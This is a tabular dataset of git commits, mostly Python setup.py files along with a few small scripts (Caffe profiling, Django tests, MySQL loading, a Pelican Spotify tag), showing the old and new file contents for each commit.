commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
50e9d1f1f66c6fc4e549fa7084f0189e0805d58e
|
Add first version of setup.py
|
drdoctr/doctr,gforsyth/doctr_testing,doctrtesting/doctr
|
setup.py
|
setup.py
|
#!/usr/bin/env python
import sys
if sys.version_info < (3,5):
sys.exit("doctr requires Python 3.5 or newer")
from setuptools import setup
import versioneer
setup(
name='doctr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description='''Deploy docs from Travis to GitHub pages.''',
author='Aaron Meurer and Gil Forsyth',
author_email='asmeurer@gmail.com',
url='https://github.com/gforsyth/doctr',
packages=['doctr'],
long_description="""
doctr
Deploy docs from Travis to GitHub pages.
License: MIT
""",
entry_points={'console_scripts': [ 'doctr = doctr.__main__:main']},
install_requires=[
'requests',
'cryptography',
],
license="MIT",
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Topic :: Documentation',
'Topic :: Software Development :: Documentation',
],
zip_safe=False,
)
|
mit
|
Python
|
|
d9bfa5d255a9a2a3ab278f94f338d2147dcdd1db
|
Fix setup
|
betatim/BlackBox,ccauet/scikit-optimize,scikit-optimize/scikit-optimize,betatim/BlackBox,scikit-optimize/scikit-optimize
|
setup.py
|
setup.py
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='scikit-optimize',
version='0.1',
description='Sequential model-based optimization toolbox.',
long_description=('Scikit-Optimize, or skopt, is a simple and efficient'
' library for sequential model-based optimization,'
' accessible to everybody and reusable in various'
' contexts.'),
url='https://scikit-optimize.github.io/',
license='BSD',
author='The scikit-optimize contributors',
packages=['skopt', 'skopt.learning', 'skopt.optimizer'],
install_requires=["numpy", "scipy", "scikit-learn>=0.18dev", "cython",
"matplotlib"]
)
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='scikit-optimize',
version='0.1',
description='Sequential model-based optimization toolbox.',
long_description=('Scikit-Optimize, or skopt, is a simple and efficient'
' library for sequential model-based optimization,'
' accessible to everybody and reusable in various'
' contexts.'),
url='https://scikit-optimize.github.io/',
license='BSD',
author='The scikit-optimize contributors',
packages=['skopt', 'skopt.learning'],
install_requires=["numpy", "scipy", "scikit-learn>=0.18dev", "cython",
"matplotlib"]
)
|
bsd-3-clause
|
Python
|
e1d4cbbeab04e6c04b822073937ef19d7ec8e34a
|
add setup.py
|
joeymeyer/raspberryturk
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(name='raspberryturk',
version='0.0.1',
description='Python package powering the Raspberry Turk chess-playing robot.',
author='Joey Meyer',
author_email='jmeyer41@gmail.com',
url='https://bitbucket.com/joeymeyer/raspberryturk',
packages=find_packages(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Programming Language :: Python :: 2.7'
]
)
|
mit
|
Python
|
|
a4f05ca4022a542dac45114a832991c6bfc93e4a
|
Remove setuptools dependence.
|
mromero107/sse,niwinz/sse
|
setup.py
|
setup.py
|
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(
name = "sse",
url = "https://github.com/niwibe/sse",
author = "Andrei Antoukh",
author_email = "niwi@niwi.be",
version="1.1",
description = "Server-Sent Events protocol implemetation.",
py_modules = ['sse'],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: Implementation :: PyPy",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Environment :: Web Environment",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
],
)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup
description = """
"""
setup(
name = "sse",
url = "https://github.com/niwibe/sse",
author = "Andrei Antoukh",
author_email = "niwi@niwi.be",
version="1.0",
description = "Server Sent Events protocol implemetation.",
install_requires=['distribute'],
zip_safe=False,
py_modules = ['sse'],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: Implementation :: PyPy",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Environment :: Web Environment",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
],
)
|
bsd-3-clause
|
Python
|
b30e1c560ecde7b2c949de42eceddf5c49c9ba01
|
add setup.py file
|
stroy1/localFoodLearner
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name="localFoodLearner",
version="0.0.1",
install_requires=[
"pandas",
"numpy",
]
)
|
mit
|
Python
|
|
7036801e6931c480a3eec611ed87f13e29a181bf
|
Bump version to 0.7.9
|
m-kiuchi/ouimeaux,m-kiuchi/ouimeaux,tomjmul/wemo,rgardner/ouimeaux,rgardner/ouimeaux,aktur/ouimeaux,sstangle73/ouimeaux,fujita-shintaro/ouimeaux,rgardner/ouimeaux,iancmcc/ouimeaux,fujita-shintaro/ouimeaux,bennytheshap/ouimeaux,drock371/ouimeaux,bennytheshap/ouimeaux,tomjmul/wemo,aktur/ouimeaux,fujita-shintaro/ouimeaux,sstangle73/ouimeaux,tomjmul/wemo,sstangle73/ouimeaux,aktur/ouimeaux,iancmcc/ouimeaux,iancmcc/ouimeaux,drock371/ouimeaux,m-kiuchi/ouimeaux,bennytheshap/ouimeaux,drock371/ouimeaux
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
here = lambda *a: os.path.join(os.path.dirname(__file__), *a)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open(here('README.rst')).read()
history = open(here('HISTORY.rst')).read().replace('.. :changelog:', '')
requirements = [x.strip() for x in open(here('requirements.txt')).readlines()]
setup(
name='ouimeaux',
version='0.7.9',
description='Open source control for Belkin WeMo devices',
long_description=readme + '\n\n' + history,
author='Ian McCracken',
author_email='ian.mccracken@gmail.com',
url='https://github.com/iancmcc/ouimeaux',
packages=[
'ouimeaux',
],
package_dir={'ouimeaux': 'ouimeaux'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='ouimeaux',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Topic :: Home Automation',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
entry_points={
'console_scripts': [
'wemo = ouimeaux.cli:wemo'
]
},
test_suite='tests',
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
here = lambda *a: os.path.join(os.path.dirname(__file__), *a)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open(here('README.rst')).read()
history = open(here('HISTORY.rst')).read().replace('.. :changelog:', '')
requirements = [x.strip() for x in open(here('requirements.txt')).readlines()]
setup(
name='ouimeaux',
version='0.8dev',
description='Open source control for Belkin WeMo devices',
long_description=readme + '\n\n' + history,
author='Ian McCracken',
author_email='ian.mccracken@gmail.com',
url='https://github.com/iancmcc/ouimeaux',
packages=[
'ouimeaux',
],
package_dir={'ouimeaux': 'ouimeaux'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='ouimeaux',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Topic :: Home Automation',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
entry_points={
'console_scripts': [
'wemo = ouimeaux.cli:wemo'
]
},
test_suite='tests',
)
|
bsd-3-clause
|
Python
|
1cbe793a5260fcfe8e16462e224bcfc19125063c
|
add a setup.py
|
jonatron/django-admin-resumable-js,jonatron/django-admin-resumable-js,jonatron/django-admin-resumable-js
|
setup.py
|
setup.py
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-admin-resumable-js',
version='0.1',
packages=['admin_resumable'],
include_package_data=True,
license='MIT License',
description='A Django app for the uploading of large files from the django admin site.',
long_description=README,
url='https://github.com/jonatron/django-admin-resumable-js',
author='Your Name',
author_email='jon4tron@gmail.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
mit
|
Python
|
|
2af222aed53f4cf799824b564ecd7e633d6356b8
|
add setup.py
|
amaxwell/datatank_py
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name = "datatank_py",
version = "0.1",
packages = [ "datatank_py" ],
install_requires = ['numpy>1.0'],
# package_data = {
# "" : [ "*.tank", "*.markdown", "*.txt" ]
# },
author = "Adam R. Maxwell",
author_email = "amaxwell@mac.com",
description = "Python modules for creating and modifying DataTank files",
license = "BSD",
)
|
bsd-3-clause
|
Python
|
|
a8b809a8f0f13bda454c2c78c08b35127bed16d6
|
Bump the patch version to 1.0.1.
|
maikelwever/django-redis-cache,chripede/django-redis-cache,carltongibson/django-redis-cache,maikelwever/django-redis-cache,carltongibson/django-redis-cache,chripede/django-redis-cache
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name="django-redis-cache",
url="http://github.com/sebleier/django-redis-cache/",
author="Sean Bleier",
author_email="sebleier@gmail.com",
version="1.0.1",
packages=["redis_cache", "redis_cache.backends"],
description="Redis Cache Backend for Django",
install_requires=['redis>=2.4.5'],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
"Environment :: Web Environment",
"Framework :: Django",
],
)
|
from setuptools import setup
setup(
name="django-redis-cache",
url="http://github.com/sebleier/django-redis-cache/",
author="Sean Bleier",
author_email="sebleier@gmail.com",
version="1.0.0",
packages=["redis_cache", "redis_cache.backends"],
description="Redis Cache Backend for Django",
install_requires=['redis>=2.4.5'],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
"Environment :: Web Environment",
"Framework :: Django",
],
)
|
bsd-3-clause
|
Python
|
2dc04229247f28c8c098f8e3e00341419a1ead1c
|
Add setup.py
|
mpkato/openliveq
|
setup.py
|
setup.py
|
# -*- coding:utf-8 -*-
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
pytest.main(self.test_args)
setup(
name = "openliveq",
packages = ["openliveq"],
version = "0.0.1",
description = "Package for NTCIR-13 OpenLiveQ",
author = "Makoto P. Kato",
author_email = "kato@dl.kuis.kyoto-u.ac.jp",
license = "MIT License",
url = "https://github.com/mpkato/openliveq",
install_requires = [
'numpy'
],
tests_require=['pytest'],
cmdclass = {'test': PyTest}
)
|
mit
|
Python
|
|
926beaa12c0e17e949c362487014a6ec7521d654
|
Add distutils - setup.py
|
nabla-c0d3/sslyze
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from sslyze import SSLYZE_VERSION, PROJECT_URL
from distutils.core import setup
setup(name='SSLyze',
version=SSLYZE_VERSION,
description='Fast and full-featured SSL scanner',
long_description=open('README.md').read(),
author_email='sslyze@isecpartners.com',
url=PROJECT_URL,
scripts=['sslyze.py'],
packages=['plugins', 'utils', 'utils.ctSSL'],
package_data={'plugins': ['data/mozilla_cacert.pem','data/mozilla_ev_oids.py']},
license=open('LICENSE.txt').read(),
)
|
agpl-3.0
|
Python
|
|
81ed734de508cb9dff61d2bc2703e54bda02067a
|
remove netifaces from package dependencies
|
lilchurro/vent,cglewis/vent,cglewis/vent,CyberReboot/vent,bpagon13/vent,lilchurro/vent,Jeff-Wang93/vent,Jeff-Wang93/vent,cglewis/vent,lilchurro/vent,bpagon13/vent,CyberReboot/vent,bpagon13/vent,Jeff-Wang93/vent,CyberReboot/vent
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='vent',
version='v0.4.3.dev',
packages=['vent', 'vent.core', 'vent.core.file_drop',
'vent.core.rq_worker', 'vent.core.rq_dashboard', 'vent.menus',
'vent.core.rmq_es_connector', 'vent.helpers', 'vent.api'],
install_requires=['docker', 'npyscreen'],
scripts=['bin/vent'],
license='Apache License 2.0',
author='arpit',
author_email='',
maintainer='Charlie Lewis',
maintainer_email='clewis@iqt.org',
description=('A library that includes a CLI designed to serve as a'
' platform to collect and analyze data across a flexible set'
' of tools and technologies.'),
keywords='docker containers platform collection analysis tools devops',
url='https://github.com/CyberReboot/vent',
)
|
from setuptools import setup
setup(
name='vent',
version='v0.4.3.dev',
packages=['vent', 'vent.core', 'vent.core.file_drop',
'vent.core.rq_worker', 'vent.core.rq_dashboard', 'vent.menus',
'vent.core.rmq_es_connector', 'vent.helpers', 'vent.api'],
install_requires=['docker', 'netifaces', 'npyscreen'],
scripts=['bin/vent'],
license='Apache License 2.0',
author='arpit',
author_email='',
maintainer='Charlie Lewis',
maintainer_email='clewis@iqt.org',
description=('A library that includes a CLI designed to serve as a'
' platform to collect and analyze data across a flexible set'
' of tools and technologies.'),
keywords='docker containers platform collection analysis tools devops',
url='https://github.com/CyberReboot/vent',
)
|
apache-2.0
|
Python
|
5262ff764e09b7d8e20cce848a288968014e648e
|
Add setup.py
|
Suor/flaws
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='iron',
version='0.0.1',
author='Alexander Schepanovski',
author_email='suor.web@gmail.com',
description='Iron out your python code.',
long_description=open('README.rst').read(),
url='http://github.com/Suor/iron',
license='BSD',
py_modules=['iron', 'astpp'],
install_requires=[
'funcy>=1.1',
],
entry_points = {
'console_scripts': [
'iron = iron:main',
],
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Environment :: Console',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
bsd-2-clause
|
Python
|
|
8dea7c6cc036e228c6a963413195d45f03a55850
|
add setup
|
Urucas/pip-check
|
setup.py
|
setup.py
|
from setuptools import setup
setup(scripts=['pip-check.py'])
|
mit
|
Python
|
|
4fe0efd61c848aa55e900031e5ae27bc3eb4b149
|
Add caffe profile tool.
|
myfavouritekk/TPN
|
tools/profiling/py_caffe_profiling.py
|
tools/profiling/py_caffe_profiling.py
|
#!/usr/bin/env python
import sys
import os
import argparse
import time
import numpy as np
if __name__ == '__main__':
parser = argparse.ArgumentParser('Time profiling of certain Caffe code.')
parser.add_argument('--caffe',
help='Path to caffe repository.')
parser.add_argument('--gpu', type=int, default=0,
help='GPU id. [0]')
parser.add_argument('--model',
help='Model prototxt.')
parser.add_argument('--weights',
help='Model parameter file (.caffemodel).')
parser.add_argument('--iterations', type=int, default=50,
help='Number of iterations. [50]')
parser.add_argument('--size', type=int, default=700,
help='Image size. [700]')
parser.add_argument('--num_roi', type=int, default=128,
help='Number of ROIs. [128]')
args = parser.parse_args()
# import caffe
sys.path.insert(0, os.path.join(args.caffe, 'python'))
print "Using caffe from {}".format(args.caffe)
try:
import caffe
except ImportError:
print "ImportError: {} seems not a caffe repository.".format(args.caffe)
sys.exit()
caffe.set_mode_gpu()
caffe.set_device(args.gpu)
net = caffe.Net(args.model, args.weights, caffe.TEST)
for i in xrange(args.iterations):
st = time.time()
size = args.size
num_roi = args.num_roi
net.blobs['data'].reshape(1, 3, size, size)
net.blobs['rois'].reshape(num_roi, 5)
net.forward()
print "Iter {}: {:.02f} s for forward.".format(
i+1, time.time() - st)
|
mit
|
Python
|
|
185851cfb4614ebe97f38a43c5e2eb9503ce5c6c
|
Add tests for model render methods
|
liu21st/masterfirefoxos,liu21st/masterfirefoxos,enng0227/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,liu21st/masterfirefoxos,enng0227/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,enng0227/masterfirefoxos,liu21st/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,mozilla/masterfirefoxos,enng0227/masterfirefoxos,craigcook/masterfirefoxos
|
masterfirefoxos/base/tests.py
|
masterfirefoxos/base/tests.py
|
from django.test import SimpleTestCase
from feincms.module.medialibrary.models import MediaFile
from . import models
class TestYouTubeParagraphEntry(SimpleTestCase):
def test_render(self):
test_data = {'title': 'Test Title', 'text': 'test text',
'youtube_id': 'test youtube id'}
rendered = models.YouTubeParagraphEntry(**test_data).render()
for value in test_data.values():
self.assertTrue(value in rendered)
class TestMediaParagraphEntry(SimpleTestCase):
def test_render(self):
test_data = {'title': 'Test Title', 'text': 'test text'}
entry = models.MediaParagraphEntry(**test_data)
entry.mediafile = MediaFile()
entry.mediafile.get_absolute_url = lambda: 'test mediafile url'
rendered = entry.render()
self.assertTrue('test mediafile url' in rendered)
for value in test_data.values():
self.assertTrue(value in rendered)
class TestFAQEntry(SimpleTestCase):
def test_render(self):
test_data = {'question': 'test question', 'answer': 'test answer'}
rendered = models.FAQEntry(**test_data).render()
for value in test_data.values():
self.assertTrue(value in rendered)
|
mpl-2.0
|
Python
|
|
b476c117ccea275e415d83e51c92ee0dbab4f6f8
|
add db loading script
|
WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss
|
mysql/load_entities.py
|
mysql/load_entities.py
|
"""
A scrpit to load entity into Database
Author: Ming
Usage:
python load_entities.py -source source -from 2015-01-01 -to 2016-01-01 -user username -pass password
"""
import MySQLdb as mdb
from datetime import date
from datetime import datetime
from dateutil.rrule import rrule, DAILY
import sys
import json
import argparse
datadir = '/home/mingf/data/'
source = 'imdb'
homedir = '/home/mingf/Weiss/'
module = 'mysql/'
start = date(2015, 1, 1)
end = date(2016, 1, 1)
release_date = ''
cfile = ''
efile = ''
dbname = ''
dbh = None
c = None
def _dict2tuple(entry):
return (entry['id'],
entry['source'],
entry['description'],
entry['url'],
entry['tid'],
entry['name']
)
def run():
with open(efile, 'r') as f:
data = json.load(f)
print "About to load", thisdate, "with", len(data), "entities"
if (len(data) == 0):
return
c.executemany(
"""INSERT INTO entity (id, source, description, url, tid, name)
VALUES (%s, %s, %s, %s, %s, %s)""",
map(_dict2tuple, data)
)
dbh.commit()
def _arg_parser():
parser = argparse.ArgumentParser(description='A script to load entity info into database.\nEx: python load_entities.py --source=imdb --start=2015-01-01 --end=2015-01-01 --user=ming --passwd=fang --db=test')
parser.add_argument('--source', dest='source', action='store', help='The source info, which would be used when openning cooresponding json file')
parser.add_argument('--start', dest='start', action='store', help='The start date, in form of YYYY-MM-DD')
parser.add_argument('--end', dest='end', action='store', help='The end date, in form of YYYY-MM-DD, The range is inclusive')
parser.add_argument('--user', dest='user', action='store', help='The user name of database')
parser.add_argument('--passwd', dest='passwd', action='store', help='The password of database')
parser.add_argument('--db', dest='dbname', action='store', help='The name of database')
results = parser.parse_args()
user = results.user
passwd = results.passwd
source = results.source
start = datetime.strptime(results.start, '%Y-%m-%d').date()
end = datetime.strptime(results.end, '%Y-%m-%d').date()
return
if __name__ == '__main__':
_arg_parser()
dbh = mdb.connect(host="localhost",
user=user,
passwd=passwd,
db=dbname)
c = dbh.cursor()
for dt in rrule(DAILY, dtstart = start, until = end):
thisdate = dt.strftime('%Y-%m-%d')
release_date = '%s,%s' % (thisdate, thisdate) ## the release date range to crawl
cfile = '%s%s_comments_%s.json' % (datadir, source, thisdate)
efile = '%s%s_entities_%s.json' % (datadir, source, thisdate)
run()
dbh.close()
|
apache-2.0
|
Python
|
|
a8e3570e373409cb442605218f1a6c936c518c5a
|
Add spotify liquid tag
|
lazycoder-ru/pelican-plugins,Xion/pelican-plugins,lazycoder-ru/pelican-plugins,talha131/pelican-plugins,if1live/pelican-plugins,kdheepak89/pelican-plugins,benjaminabel/pelican-plugins,jakevdp/pelican-plugins,gjreda/pelican-plugins,florianjacob/pelican-plugins,seandavi/pelican-plugins,phrawzty/pelican-plugins,ingwinlu/pelican-plugins,ziaa/pelican-plugins,jakevdp/pelican-plugins,xsteadfastx/pelican-plugins,mwcz/pelican-plugins,mortada/pelican-plugins,lele1122/pelican-plugins,MarkusH/pelican-plugins,gjreda/pelican-plugins,Xion/pelican-plugins,olgabot/pelican-plugins,lindzey/pelican-plugins,frickp/pelican-plugins,MarkusH/pelican-plugins,farseerfc/pelican-plugins,Samael500/pelican-plugins,pelson/pelican-plugins,UHBiocomputation/pelican-plugins,pestrickland/pelican-plugins,shireenrao/pelican-plugins,shireenrao/pelican-plugins,howthebodyworks/pelican-plugins,mitchins/pelican-plugins,lazycoder-ru/pelican-plugins,lindzey/pelican-plugins,joachimneu/pelican-plugins,pxquim/pelican-plugins,rlaboiss/pelican-plugins,if1live/pelican-plugins,joachimneu/pelican-plugins,pelson/pelican-plugins,benjaminabel/pelican-plugins,cmacmackin/pelican-plugins,danmackinlay/pelican-plugins,proteansec/pelican-plugins,frickp/pelican-plugins,lele1122/pelican-plugins,xsteadfastx/pelican-plugins,jakevdp/pelican-plugins,cmacmackin/pelican-plugins,publicus/pelican-plugins,MarkusH/pelican-plugins,cctags/pelican-plugins,howthebodyworks/pelican-plugins,UHBiocomputation/pelican-plugins,barrysteyn/pelican-plugins,amitsaha/pelican-plugins,jprine/pelican-plugins,mwcz/pelican-plugins,M157q/pelican-plugins,ingwinlu/pelican-plugins,Neurita/pelican-plugins,jfosorio/pelican-plugins,publicus/pelican-plugins,wilsonfreitas/pelican-plugins,pelson/pelican-plugins,M157q/pelican-plugins,mortada/pelican-plugins,mikitex70/pelican-plugins,jprine/pelican-plugins,florianjacob/pelican-plugins,clokep/pelican-plugins,amitsaha/pelican-plugins,karya0/pelican-plugins,seandavi/pelican-plugins,doctorwidget/pelican-plugins,jantman/pelican-plugins,Xion/pelican-plugins,yuanboshe/pelican-plugins,prisae/pelican-plugins,mortada/pelican-plugins,farseerfc/pelican-plugins,florianjacob/pelican-plugins,doctorwidget/pelican-plugins,kdheepak89/pelican-plugins,makefu/pelican-plugins,mortada/pelican-plugins,pxquim/pelican-plugins,proteansec/pelican-plugins,seandavi/pelican-plugins,proteansec/pelican-plugins,rlaboiss/pelican-plugins,benjaminabel/pelican-plugins,barrysteyn/pelican-plugins,jantman/pelican-plugins,talha131/pelican-plugins,ingwinlu/pelican-plugins,cmacmackin/pelican-plugins,talha131/pelican-plugins,ziaa/pelican-plugins,publicus/pelican-plugins,UHBiocomputation/pelican-plugins,benjaminabel/pelican-plugins,ziaa/pelican-plugins,clokep/pelican-plugins,andreas-h/pelican-plugins,farseerfc/pelican-plugins,farseerfc/pelican-plugins,makefu/pelican-plugins,makefu/pelican-plugins,goerz/pelican-plugins,cmacmackin/pelican-plugins,jakevdp/pelican-plugins,amitsaha/pelican-plugins,florianjacob/pelican-plugins,andreas-h/pelican-plugins,prisae/pelican-plugins,karya0/pelican-plugins,karya0/pelican-plugins,MarkusH/pelican-plugins,andreas-h/pelican-plugins,M157q/pelican-plugins,Samael500/pelican-plugins,prisae/pelican-plugins,farseerfc/pelican-plugins,xsteadfastx/pelican-plugins,shireenrao/pelican-plugins,rlaboiss/pelican-plugins,lindzey/pelican-plugins,mikitex70/pelican-plugins,wilsonfreitas/pelican-plugins,goerz/pelican-plugins,mikitex70/pelican-plugins,davidmarquis/pelican-plugins,gjreda/pelican-plugins,if1live/pelican-plugins,mwcz/pelican-plugins,cctags/pelican-plugins,mitchins/pelican-plugins,olgabot/pelican-plugins,Xion/pelican-plugins,pelson/pelican-plugins,pxquim/pelican-plugins,publicus/pelican-plugins,goerz/pelican-plugins,Samael500/pelican-plugins,amitsaha/pelican-plugins,joachimneu/pelican-plugins,clokep/pelican-plugins,doctorwidget/pelican-plugins,jantman/pelican-plugins,Neurita/pelican-plugins,xsteadfastx/pelican-plugins,jantman/pelican-plugins,jfosorio/pelican-plugins,Samael500/pelican-plugins,seandavi/pelican-plugins,cctags/pelican-plugins,pestrickland/pelican-plugins,davidmarquis/pelican-plugins,yuanboshe/pelican-plugins,ziaa/pelican-plugins,wilsonfreitas/pelican-plugins,gjreda/pelican-plugins,makefu/pelican-plugins,Neurita/pelican-plugins,pestrickland/pelican-plugins,danmackinlay/pelican-plugins,UHBiocomputation/pelican-plugins,Neurita/pelican-plugins,clokep/pelican-plugins,ingwinlu/pelican-plugins,kdheepak89/pelican-plugins,olgabot/pelican-plugins,shireenrao/pelican-plugins,lele1122/pelican-plugins,goerz/pelican-plugins,olgabot/pelican-plugins,jfosorio/pelican-plugins,yuanboshe/pelican-plugins,andreas-h/pelican-plugins,proteansec/pelican-plugins,phrawzty/pelican-plugins,karya0/pelican-plugins,mwcz/pelican-plugins,phrawzty/pelican-plugins,barrysteyn/pelican-plugins,talha131/pelican-plugins,talha131/pelican-plugins,lele1122/pelican-plugins,phrawzty/pelican-plugins,lazycoder-ru/pelican-plugins,yuanboshe/pelican-plugins,doctorwidget/pelican-plugins,frickp/pelican-plugins,prisae/pelican-plugins,howthebodyworks/pelican-plugins,danmackinlay/pelican-plugins,joachimneu/pelican-plugins,howthebodyworks/pelican-plugins,pxquim/pelican-plugins,wilsonfreitas/pelican-plugins,cctags/pelican-plugins,frickp/pelican-plugins,pestrickland/pelican-plugins,barrysteyn/pelican-plugins,lindzey/pelican-plugins,jfosorio/pelican-plugins,mitchins/pelican-plugins,danmackinlay/pelican-plugins,mikitex70/pelican-plugins,mortada/pelican-plugins,if1live/pelican-plugins,rlaboiss/pelican-plugins,MarkusH/pelican-plugins,kdheepak89/pelican-plugins,M157q/pelican-plugins,mitchins/pelican-plugins,davidmarquis/pelican-plugins,davidmarquis/pelican-plugins
|
liquid_tags/spotify.py
|
liquid_tags/spotify.py
|
"""
Spotify Tag
---------
This implements a Liquid-style spotify tag for Pelican,
based on the jekyll / octopress youtube tag [1]_
Syntax
------
{% spotify id %}
Example
-------
{% spotify 1HNZcRFlIKwHAJD3LxvX4d %}
Output
------
<iframe src='https://embed.spotify.com/?uri=spotify:track:1HNZcRFlIKwHAJD3LxvX4d' width='300' height='380' frameborder='0' allowtransparency='true'></iframe>
"""
import os
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = "{% spotify id %}"
SPOTIFY = re.compile(r'(\w+)(\s+(\d+)\s(\d+))?')
@LiquidTags.register('spotify')
def spotify(preprocessor, tag, markup):
spotify_id = None
match = SPOTIFY.search(markup)
if match:
groups = match.groups()
spotify_id = groups[0]
if spotify_id:
spotify_out = """
<iframe src='https://embed.spotify.com/?uri=spotify:track:{}'
width='300'
height='380'
frameborder='0'
allowtransparency='true'></iframe>""".format(spotify_id).strip()
else:
raise ValueError("Error processing input, "
"expected syntax: {0}".format(SYNTAX))
return spotify_out
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
|
agpl-3.0
|
Python
|
|
958abe5b298f255df5e4aef94b12d647f1319650
|
Create new package (#6811)
|
tmerrick1/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,tmerrick1/spack,mfherbst/spack,krafczyk/spack,krafczyk/spack,EmreAtes/spack,mfherbst/spack,iulian787/spack,krafczyk/spack,krafczyk/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,matthiasdiener/spack,LLNL/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,LLNL/spack,mfherbst/spack,EmreAtes/spack,iulian787/spack,krafczyk/spack,matthiasdiener/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,LLNL/spack,iulian787/spack,tmerrick1/spack,EmreAtes/spack
|
var/spack/repos/builtin/packages/py-pyani/package.py
|
var/spack/repos/builtin/packages/py-pyani/package.py
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
